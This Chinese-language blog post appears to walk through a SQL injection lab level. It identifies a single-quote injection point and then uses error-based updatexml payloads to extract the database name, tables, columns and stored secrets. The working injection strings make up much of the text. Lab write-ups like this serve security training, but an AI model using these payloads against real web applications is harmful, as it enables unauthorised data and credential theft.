这一关只有五次机会了 哎怎么办啊 那就只能找出每轮的共同点 这一关肯定不能一轮就完成所有的操作 至少得分个两轮进行操作才可以 前一轮进行注入类型的获取 后一轮进行各种爆破操作 分配好了 首先去判断一下注入类型是否属于数字型注入 输入如下
id=1 and 1=2回显如下 不属于数字型
接着输入1' 看看是否属于单引号注入 回显如下 呦 出现报错信息了 从报错信息可以知道这个注入类型属于单引号注入
佐证一下吧 输入1'--+ 回显如下
可以的那么就是属于单引号注入类型
我们先试试看联合注入方式吧
输入如下
id=0' union select 1,2,3--+看来不能使用联合注入方式 只能使用报错注入了 我们先来将这一轮消费掉再说 下一轮在进行通过报错注入实现各种爆破
基于上一轮判断出来的注入类型 我们将上一关的结论用到这一关上面去 而且这一关我们要使用报错注入
首先进行爆库操作 输入如下
id=0' and updatexml(1,concat(0x7e,database(),0x7e),1)--+回显如下
接着进行报表操作输入如下
id=0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+回显如下
接着进行爆字段操作 输入如下
id=0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kiqqd6uxvr'),0x7e),1)--+回显如下
最后进行爆用户民和密码操作 输入如下
id=0' and updatexml(1,concat(0x7e,(select group_concat(sessid,'-',secret_8UZ4) from kiqqd6uxvr),0x7e),1)--+回显如下
通关成功!!嗨嗨!!
1352
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
